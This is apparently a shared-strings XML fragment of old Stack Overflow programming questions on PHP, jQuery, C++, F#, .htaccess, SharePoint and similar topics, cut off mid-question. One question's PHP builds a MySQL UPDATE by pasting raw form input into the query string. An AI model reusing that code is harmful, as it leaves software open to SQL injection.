  <si>
    <t>What are the advantages and disadvantages of the Properties Pattern?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Steve Yegge describes the &lt;strong&gt;Properties Pattern&lt;/strong&gt; in a &lt;a href="http://steve-yegge.blogspot.com/2008/10/universal-design-pattern.html#Property"&gt;blog post&lt;/a&gt; of his.&lt;/p&gt;
&lt;p&gt;For someone using a static language like C# or Java, what are the advantages and disadvantages of this approach? In what kind of projects would you want to use the Properties Pattern, and when would you want to avoid it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to move the environment details outside the EAR</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Our project is a medium size web application developed using RAD 7.0 on WAS 6.1/hibernate/struts which moved to production. Currently we have hardcoded the ip address of the production system in the property file and database schema details in the hibernate config file. &lt;/p&gt;
&lt;p&gt;Our client wants us to come up with the solution for keeping the environment details out side the EAR, so that they can change the environment/db details in future with out opening the EAR .&lt;/p&gt;
&lt;p&gt;Any pointers would be very helpful. Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Keeping an array sorted in PHP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a PHP script which reads a large CSV and performs certain actions, but only if the "username" field is unique. The CSV is used in more than one script, so changing the input from the CSV to only contain unique usernames is not an option.&lt;/p&gt;
&lt;p&gt;The very basic program flow (which I'm wondering about) goes like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$allUsernames = array();
while($row = fgetcsv($fp)) {
    $username = $row[0];
    if (in_array($username, $allUsernames)) continue;
    $allUsernames[] = $username;
    // process this row
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Since this CSV could actually be quite large, it's that &lt;code&gt;in_array&lt;/code&gt; bit which has got me thinking. The most ideal situation when searching through an array for a member is if it is already sorted, so &lt;strong&gt;how would you build up an array from scratch, keeping it in order&lt;/strong&gt;? Once it is in order, would there be a more efficient way to search it than using &lt;code&gt;in_array()&lt;/code&gt;, considering that it probably doesn't know the array is sorted?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Notifying the user after a long Ajax task when they might be on a different page</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an Ajax request to a web service that typically takes 30-60 seconds to complete. In some cases it could take as long as a few minutes. During this time the user can continue working on other tasks, which means they will probably be on a different page when the task finishes.&lt;/p&gt;
&lt;p&gt;Is there a way to tell that the original request has been completed? The only thing that comes to mind is to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;wrap the web service with a web service of my own&lt;/li&gt;
&lt;li&gt;use my web service to set a flag somewhere&lt;/li&gt;
&lt;li&gt;check for that flag in subsequent page requests&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Any better ways to do it? I am using jQuery and ASP.Net, if it matters.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Including boost::filesystem produces linking errors</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ok first off, I am linking to boost_system and boost_filesystem.&lt;/p&gt;
&lt;p&gt;My compiler is a &lt;a href="http://nuwen.net/mingw.html" rel="nofollow"&gt;custom build of MinGW with GCC 4.3.2&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;So when I include:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include "boost/filesystem.hpp"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I get linking errors such as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;..\..\libraries\boost\libs\libboost_system.a(error_code.o):error_code.cpp:
    (.text+0xe35)||undefined reference to `_Unwind_Resume'|
..\..\libraries\boost\libs\libboost_system.a(error_code.o):error_code.cpp:
    (.eh_frame+0x12)||undefined reference to `__gxx_personality_v0'|
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which after a little searching I found is most commonly when you try to link a C++ program with gcc, the GNU C compiler. But I printed out the exact build command that &lt;a href="http://www.codeblocks.org/" rel="nofollow"&gt;Code::Blocks&lt;/a&gt; is running, and it is definitely linking with g++.&lt;/p&gt;
&lt;p&gt;If I comment out this include, everything works fine.&lt;/p&gt;
&lt;p&gt;Any ideas? Also, as a side, anyone know of a good place to get windows binaries for boost? The build system is giving me issues, so I'm using some binaries that came with this &lt;a href="http://nuwen.net/mingw.html#contents" rel="nofollow"&gt;custom MinGW package&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>F# Units of measure, problems with genericity 2</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Following on from &lt;a href="http://stackoverflow.com/questions/460766/f-units-of-measure-problems-with-genericity"&gt;this&lt;/a&gt; question, I still seem to be battling at the frontiers of what is possible, though I don't think that I'm doing anything particularly bleeding edge:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;type Vector2d = { X: float&amp;lt;'u&amp;gt;; Y: float&amp;lt;'u&amp;gt; }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Gives me &lt;em&gt;error FS0039: The unit-of-measure parameter 'u' is not defined.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;And &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;type Vector2d = { X: float&amp;lt;_&amp;gt;; Y: float&amp;lt;_&amp;gt; }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Gives me &lt;em&gt;error FS0191: anonymous unit-of-measure variables are not permitted in this declaration.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Is it the case that functions can handle 'generic' units of measure, but types can't?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Converting Value Type of a Dictionary in VB.net</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;Public Class A
Public Class B : Inherits A
Dim DictA As Dictionary(Of Integer, A)
Dim DictB As New Dictionary(Of Integer, B)
DictA = DictB
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This doesn't work, as the type can't be converted. Is this somehow possible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does modified Open Source code HAS-TO-BE open-sourced?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have taken an open-source application, released under GPL ver1.09 and have modified some parts of its source and have made some customisations/enhancements as per our requirement.&lt;/p&gt;
&lt;p&gt;We are using this application for non-commercial, internal purposes only.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Is it mandatory that we have to publish the modified code in open-source, if we wish to use it?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;EDIT : Does it vary in any way, depending upon its user-base? (e.g. Just the company employees or outsiders as well?)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I unset an element's CSS attribute using jQuery?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I set a CSS value on a specific element using:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$('#element').css('background-color', '#ccc');
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to be able to unset that element-specific value and use the cascaded value, along the lines of:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$('#element').css('background-color', null);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But that syntax doesn't seem to work -- is this possible using another syntax?&lt;/p&gt;
&lt;p&gt;Thanks in advance!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; The value isn't inherited from the parent element -- the original values comes from an element-level selector. Sorry for any confusion!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How would I require a password for all files except one using .htaccess?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a new website I'm working on that the client wants to keep a secret, but at the same time, I want to put an under construction page with some info on it. I would like to have everything except index.html require a user/password--index.html would be available to everyone.&lt;/p&gt;
&lt;p&gt;I have the following, but I'm not sure what I need to add:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;AuthName "Restricted Area"
AuthType Basic
AuthUserFile /path/to/file/.htpasswd
AuthGroupFile /dev/null
require valid-user
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;There are too many files and possibly new files to say "for this set of files require a user/password".&lt;/p&gt;
&lt;p&gt;I think it has something to do with something similar to:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Files index.html&amp;gt;
order deny,allow
allow from all
&amp;lt;/Files&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I'm not exactly sure how.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>run a web project developed in Java run on both windows and Linux platform</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a web project developed in java. I am using the Windows platform and accessing the project from the Windows machine itself. How can I make the project run on a Linux machine? I am using jboss server and deploying the project.&lt;/p&gt;
&lt;p&gt;Regards&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should I still learn C if I already know Assembly?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Often one of the main reasons given for learning C is that it brings you closer to programming at a low level which gives you insights into how things really work in higher level languages.&lt;/p&gt;
&lt;p&gt;I've been programming in various Assembly flavors for awhile and you can't get any lower level than what I have been coding in and I have no illusions about what reference types or pointers really are. It should be pointed out that I also am fairly prolific in Java and C#.  I don't only know assembly.&lt;/p&gt;
&lt;p&gt;Is it still worth the effort cracking open &lt;a href="http://en.wikipedia.org/wiki/The_C_Programming_Language_(book)" rel="nofollow"&gt;K&amp;amp;R&lt;/a&gt; and spending some valuable time learning the intricacies of the C language or would my time best be served learning something else?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>friend class : inherited classes are not friend as well?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In C++, I have a class A which is friend with a class B.&lt;/p&gt;
&lt;p&gt;I looks like inherited classes of B are not friend of class A.&lt;/p&gt;
&lt;p&gt;I this a limitation of C++ or my mistake ?&lt;/p&gt;
&lt;p&gt;Here is an example. When compiling, I get an error on line "return new Memento":&lt;/p&gt;
&lt;p&gt;Memento::Memento : impossible to access private member declared in Memento.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Originator;
class Memento
{
  friend class Originator;
  Memento() {};
  int m_Data;
public:
  ~Memento() {};
};
class Originator
{
public:
  virtual Memento* createMemento() = 0;
};
class FooOriginator : public Originator
{
public:
  Memento* createMemento()
  {
    return new Memento; // Impossible to access private member of Memento
  }
};
void main()
{
  FooOriginator MyOriginator;
  MyOriginator.createMemento();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I could of course add FooOriginator as friend of Memento, but then, this means I would have to add all Originator-inherited classes as friend of Memento, which is something I'd like to avoid.&lt;/p&gt;
&lt;p&gt;Any idea ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>System information as desktop wall-paper on Remote Desktop</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When opening Remote Desktop to different Windows servers, it is easy to confuse two remote desktops.&lt;/p&gt;
&lt;p&gt;How do I get each remote server to automatically display some system information as desktop wallpaper, ie. Computer Name, Operating System, IP Address, etc.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to convert standard IP address format string to hex and long?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know how to get the IP address in decimal or hex from standard IP address format string ("xxx.xxx.xxx.xxx")?&lt;/p&gt;
&lt;p&gt;I've tried to use the inet_addr() function but didn't get the right result.&lt;/p&gt;
&lt;p&gt;I tested it on "84.52.184.224"&lt;/p&gt;
&lt;p&gt;the function returned 3770168404 which is not correct (the correct result is 1412741344).&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Maximum lookup fields in a list</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In SharePoint 2007, is there a limit to the number of lookup-fields that you can have in a list?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is Dynamic SQL more vulnerable to SQL Injection/hacking?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is Dynamic SQL more vulnerable to SQL Injection/hacking? 
If yes, how to prevent?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Anybody know any good silverlight tutorials?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As the title says :)&lt;/p&gt;
&lt;p&gt;I've been waiting for Wrox to release "Professional silverlight 2.0" for ages but it's been delayed by nearly a year and I want to have a Play with silverlight.&lt;/p&gt;
&lt;p&gt;Ignoring the silverlight.net site, does anyone know of any good beginners tutorials that focus on coding in Visual Studio instead of Blend?&lt;/p&gt;
&lt;p&gt;Jon&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Creating an isset if function using php to avoid and update if the input is empty for a MYSQL update</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi I am newish to php and I have created an update page for Content Management System. I have a file upload in this case a picture. I have other inputs that contain text and I can get them to populate my form and thats fine and works great because the user can see what has already been entered. But the file name for the photo can not have a value so if the user doesn't pick the picture from the directory again it will update minus the picture. &lt;strong&gt;What I think I need is a isset function that says if the file (picture) input is left blank don't update this field and use whatever what already in the database for it, that way if it was left blank when created it will still be, and if the user has changed it this time it will change; or if they want to leave it the same it won't leave their picture blank. Hope that makes sence.&lt;/strong&gt;  &lt;/p&gt;
&lt;p&gt;Here is my coding currently for the Form: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt; &amp;lt;p&amp;gt;
              Photo:
            &amp;lt;/p&amp;gt;
            &amp;lt;input type="hidden" name="MAX_FILE_SIZE" value="350000"&amp;gt;
            &amp;lt;input type="file" name="photo"/&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Below is my php code for my update if the update button is pressed:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   $con = mysql_connect("localhost","******","********");
if (!$con)
  {
  die('Could not connect: ' . mysql_error());
  }
mysql_select_db("*******", $con);
  // run this only, once the user has hit the "Update" button
  if (isset($_POST['update'])) {
    // assign form inputs
    $name = $_POST['nameMember'];
    $position = $_POST['bandMember'];
    $pic = $_POST['photo'];
    $about = $_POST['aboutMember'];
    $bands = $_POST['otherBands'];
      // add member to database
    $result = mysql_query("UPDATE dbProfile SET nameMember='".$name."',bandMember='".$position."',photo='".$pic."',aboutMember='".$about."',otherBands='".$bands."' WHERE id='".$id."'");
        mysql_close($con);
      Header("Location: listMember.php"); 
      exit; 
    }
  else { // read member data from database
    $result = mysql_query ("SELECT * FROM dbProfile WHERE id='".$id."'");
    while($row = mysql_fetch_array($result))
{
   $name = $row['nameMember'];
    $position = $row['bandMember'];
    $pic = $row['photo'];
    $about = $row['aboutMember'];
    $bands = $row['otherBands'];
  }
  }
  mysql_close($con);
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If you could help I would be very please and greatful. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET MVC Framework 'REST-like' API</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have developed a 'REST-like' XML API that I wish to expose for consumption by third-party web applications. I'm now looking to implement a security model for the exchange of data between a third-party application and the 'REST-like' XML API. I would appreciate suggestions for a suitable asymmetric encryption model.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a KDE systray epplet for Enlightment?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Enlightenment DR16 is packaged with openSUSE 11.1 but it's a bit painful to use with KDE apps as there's no obvious (on the Enlightenment site, google etc.) way to provide a systray for KDE apps that require one (e.g., ktorrent).&lt;/p&gt;
&lt;p&gt;Anyone know of a way around this?&lt;/p&gt;
&lt;p&gt;I'm not using e for the eye-candy - I'm running on a 2.6GHz Celeron and KDE (4.1) performance isn't exactly stellar so I'm trying out a few alternatives.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should I use Perl or Python for network monitoring?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to have some work done on the Network front, pinging numerous computers on a LAN and retrieving data about the response time. Which would be the most useful and productive to work with: Perl or Python?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I stop cl.exe from terminating when a user logs out?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have an automated build server that produces builds using Visual Studio 2005 and &lt;a href="http://ccnet.thoughtworks.com/" rel="nofollow"&gt;CruiseControl.NET&lt;/a&gt; (on Windows XP x64).  Normally nobody is logged into the system, but occasionally we have to log in via Remote Desktop in order to perform maintenance.&lt;/p&gt;
&lt;p&gt;We have noticed that if &lt;code&gt;cl.exe&lt;/code&gt; is running (Microsoft's C++ compiler) at the instant we log out from remote desktop, then &lt;code&gt;cl.exe&lt;/code&gt; will terminate with error result 4:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Project : error PRJ0002 : Error result 4 returned from 'C:\Program Files (x86)\Microsoft Visual Studio 8\VC\bin\cl.exe'.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This obviously causes the current build to fail with a pretty mysterious message. &lt;strong&gt;Does anyone know how to prevent this from happening?&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>" NSRangeException " problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to build an iPhone app. But at the time of compiling there is a message showing that &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[Session started at 2009-01-29 18:25:40 +0600.]
2009-01-29 18:25:44.238 SimpleGame[3691:20b] *** Terminating app due to uncaught exception 'NSRangeException', reason: '*** -[NSCFArray objectAtIndex:]: index (1) beyond bounds (0)'
2009-01-29 18:25:44.247 SimpleGame[3691:20b] Stack: ( .........
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Actually when I do active these code then this message is shown, code are:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;NSMutableArray *todoArray = [[NSMutableArray alloc] init];
self.todos = todoArray;
[todoArray release];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I overcome this problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to use jQuery in Firefox Extension</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to use jQuery inside a firefox extension,
I imported the library in the xul file like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;script type="application/x-javascript" src="chrome://myExtension/content/jquery.js"&amp;gt; &amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but the $() function is not recognized in the xul file neither do the jQuery().&lt;/p&gt;
&lt;p&gt;I googled about the problem and found some solutions but no one did work with me:
&lt;a href="http://gluei.com/blog/view/using-jquery-inside-your-firefox-extension"&gt;http://gluei.com/blog/view/using-jquery-inside-your-firefox-extension&lt;/a&gt;
&lt;a href="http://forums.mozillazine.org/viewtopic.php?f=19&amp;amp;t=989465"&gt;http://forums.mozillazine.org/viewtopic.php?f=19&amp;amp;t=989465&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I've also tried to pass the 'content.document' object(which refrences the 'document' object) as the context parameter to the jQuery function like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$('img',content.document);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but still not working,
does any one came across this problem before?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I get the CPU core number from within a user-space app (Linux, C)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Presumably there is a library or simple asm blob that can get me the number of the current CPU that I am executing on.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you remove a self-installed DLL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a DLL on a server that has somehow been registered as self installed instead of a Component Service it is under Microsoft/COM3/SelfReg/CLSID with the ID and information for this DLL stored there - this component needs to be replaced or removed for updating how do you remove it regsvr32 will not work and there is no visible entry for it other than in the registry. How to Unregister this is all that is required. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Hide authorized menu item in asp.net web.sitemap</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a web.sitemap with security trimming enabled, however I need to hide a menu item based on a role to a page that has no access rules in the web.config.&lt;/p&gt;
&lt;p&gt;i.e I have a Campaign page that is used to view existing campaigns as well as to add new campaigns, but I want the "New Campaigns" menu item to be hidden for anonymous users.
I tried adding the role name to the roles attribute in the web.sitemap but this has no effect.&lt;/p&gt;
&lt;p&gt;I'm sure there must be a quick way to do this without modifying the sitemap provider which is my next port of call.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Toolbar with VLC ActiveX in VB.NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've used the &lt;strong&gt;VideoLAN &lt;a href="http://wiki.videolan.org/ActiveX" rel="nofollow"&gt;VLC ActiveX&lt;/a&gt; Plugin 2&lt;/strong&gt; (available in the &lt;a href="http://www.videolan.org/vlc/download-windows.html" rel="nofollow"&gt;VLC 0.9.4 installation&lt;/a&gt;) in my VB.NET App.&lt;/p&gt;
&lt;p&gt;I've noticed that:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The controller toolbar (seek bar, control buttons, volume) do NOT appear at all&lt;/li&gt;
&lt;li&gt;Even after playing a file&lt;/li&gt;
&lt;li&gt;And the &lt;strong&gt;"Toolbar" property&lt;/strong&gt; cannot be set to TRUE, read-only?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So my questions are:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Is the &lt;strong&gt;"Toolbar" property&lt;/strong&gt; a useless thing or is there a special way to get it to TRUE?&lt;/li&gt;
&lt;li&gt;Will the &lt;strong&gt;Toolbar appear&lt;/strong&gt; at all or would I have to implement it myself?&lt;/li&gt;
&lt;li&gt;If I have to make a custom seek slider with control buttons, what are the &lt;strong&gt;API calls&lt;/strong&gt; I can use to control media playback and seek-to-frame? VB.NET?&lt;/li&gt;
&lt;li&gt;Is there &lt;strong&gt;ANY other way&lt;/strong&gt; I can get the VLC player &lt;strong&gt;with its Toolbar&lt;/strong&gt; in my App? &lt;a href="http://wiki.videolan.org/Libvlc" rel="nofollow"&gt;Libvlc?&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;img src="http://wiki.videolan.org/images/Vlc-en.png" alt="alt text" /&gt;&lt;/p&gt;
&lt;p&gt;^ This is &lt;a href="http://wiki.videolan.org/images/Vlc-en.png" rel="nofollow"&gt;the toolbar&lt;/a&gt; that I would like to have in my VB.NET App.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Concatenating Lambda Functions in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Using C# 3.5 I wanted to build up a predicate to send to a where clause piece by piece.  I have created a very simple Console Application to illustrate the solution that I arrived at. This works perfectly.  Absolutely perfectly.  But I have NO idea how or why.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    public static Func&amp;lt;Tran, bool&amp;gt; GetPredicate()
    {
        Func&amp;lt;Tran, bool&amp;gt; predicate = null;
        predicate += t =&amp;gt; t.Response == "00";
        predicate += t =&amp;gt; t.Amount &amp;lt; 100;
        return predicate;
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I say 'predicate +=', what does that mean?  predicate -= appears to do nothing and ^=, &amp;amp;=, *=, /= aren't liked by the compiler.&lt;/p&gt;
&lt;p&gt;The compiler doesn't like 'predicate = predicate + t =&gt; t.Response....' either.&lt;/p&gt;
&lt;p&gt;What have I stumbled on? I know what it does, but how does it do it?&lt;/p&gt;
&lt;p&gt;If anyone wants to go delve into more complicated lambda's, please do so.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Risk of using contentEditable in IE</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have to add a basic HTML editor to our product.  As we only support IE at present (most customers are still on IE 6), I have been told to use the Internet Explorer built-in XHTML editing capabilities â€“ e.g. &lt;code&gt;&amp;lt;div contentEditable="true"&amp;gt;&lt;/code&gt; as explained at "&lt;a href="http://www.maconstateit.net/tutorials/JSDHTML/JSDHTML12/jsdhtml12-02.htm"&gt;Editing a Web Page&lt;/a&gt;" .&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Apart&lt;/strong&gt; from not working in other browsers. (The management does not consider it being a problem.  Our customers will put up with our software only working with IE.  We have never lost any money by our software only working in IE; most customers will only let their staff use IE6 at present anyway)&lt;/p&gt;
&lt;p&gt;What &lt;strong&gt;other&lt;/strong&gt; problem are we likely to get with contentEditable?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The HTML editor I wrote with â€œcontentEditableâ€ proved to very hard to get reliable,  with many &lt;a href="http://stackoverflow.com/questions/527866/why-is-contenteditable-removing-id-from-div"&gt;problems&lt;/a&gt;.  If I had to do this again, I would push &lt;strong&gt;very hard&lt;/strong&gt; to one of the many open source solutions (e.g. TinyMCE) or buy in a supported HTML editor. &lt;/p&gt;
&lt;p&gt;No doubt that a very skilled jscript programmer can get â€œcontentEditableâ€ to work well given enough time.  It just that all the examples on the web looks so simple, until you test common operations like doing a cut/paste from word and trying to edit the resulting HTML.  (just the sort of things a customer will do)&lt;/p&gt;
&lt;p&gt;(Just search for â€œcontentEditableâ€ on stackoverflow to get some ideal of the problems other people have had)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How Many Tables Should be Placed on the Same Partition Scheme?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My company just provided me with SQL Server 2005 Enterprise Edition and I wanted to partition some tables with large(r) amounts of data. I have about about 5 or 6 tables which would be a good fit to partition by datetime.&lt;/p&gt;
&lt;p&gt;There will be some queries that need 2 of these tables in the course of the same query.&lt;/p&gt;
&lt;p&gt;I was wondering if I should use the same partition scheme for all of these tables or if I should copy the partition scheme and put different tables on each one.&lt;/p&gt;
&lt;p&gt;Thanks for any help in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>AJAX/JQUERY/PHP issue</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to use an ajax 'POST' call through the jquery $.ajax function to send data to a php file.  For some reason the callback is a success but the data is not getting to the php file.  Here is an example of the code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
In JS file:
$.ajax({ type: "POST",
        url: "setData.php",
        data: "myPOSTvar=myData"
        success: function(){ alert("Data Saved"); } 
       });
In php file:
$var = $_POST['myPOSTvar']
...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;$var ends up with a default value instead of the data it is sent.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
&lt;p&gt;Sorry about the syntax errors...at work right now and don't have my code in front of me...the syntax is all correct in the actual script, just typed to quick when posting here...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I edit a registry key with VB.NET or VB6?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to edit a registry key and set the data value to "4"&lt;/p&gt;
&lt;p&gt;I know how to do it through the command prompt but am trying to find some Visual Basic code to do it.&lt;/p&gt;
&lt;p&gt;If it helps, this is the key:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\USBSTOR\Start&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>T4 vs CodeDom vs Oslo</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In an application scaffolding project on which I'm working, I'm trying to decide whether to use &lt;a href="http://msdn.microsoft.com/en-us/oslo/default.aspx"&gt;Oslo&lt;/a&gt;, &lt;a href="http://www.olegsych.com/2007/12/text-template-transformation-toolkit/"&gt;T4&lt;/a&gt; or &lt;a href="http://msdn.microsoft.com/en-us/library/y2k85ax6.aspx"&gt;CodeDom&lt;/a&gt; for generating code. Our goals are to keep dependencies to a minimum and drive code generation for a domain driven design from user stories. The first step will be to create the tests from the user stories, but we want the domain experts to be able to write their stories in a variety of different media (e.g. custom app, Word, etc.) and still generate the tests from the stories.&lt;/p&gt;
&lt;p&gt;What I know so far:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;CodeDom requires .NET but can only output .NET class files (e.g. .cs, .vb). Level of difficulty is fairly high.&lt;/li&gt;
&lt;li&gt;T4 requires CodeDom and VS Standard+. Level of difficulty is fairly reasonable, especially with the &lt;a href="http://www.codeplex.com/t4toolbox"&gt;T4 Toolbox&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Oslo is very new. I have no idea of the dependencies, but I imagine you must be on at least .NET 3.5. I'm also not certain as to the code generation abilities or the complexity for adding new grammars. However, domain experts could probably write user stories in Intellipad quite easily. Also not sure about ease of converting stories in Word to an MGrammar.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;What are your thoughts, experiences, etc. with any of the above tools. We want to stick with Microsoft or open source tools.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Distributing applications where the configuration settings are encrypted using Entrerprise library</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a thought about this but could not come with a good solution. &lt;/p&gt;
&lt;p&gt;I have a windows application. I use enterprise library (3.1) Data Access Application Block. Now I use the DataProtectionConfigurationProvider to encrypt the connection strings.
This application has to be deployed across multiple machines. I don't want the end users to open EntLibConfig.exe and configure the connection strings. How do I go about this?&lt;/p&gt;
&lt;p&gt;Thanks,
Ramjee&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Drag window from a grid</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have created a custom window set to windowStyle="none", (no title or maximize - minimize buttons) and i am trying to implement a DragMove operation when the user clicks and drags on a grid. (this is wired up by calling DragMove on a MouseLeftButtonDown Handler) &lt;/p&gt;
&lt;p&gt;First weird issue that this event nevers gets fired if the grid has no backround. 
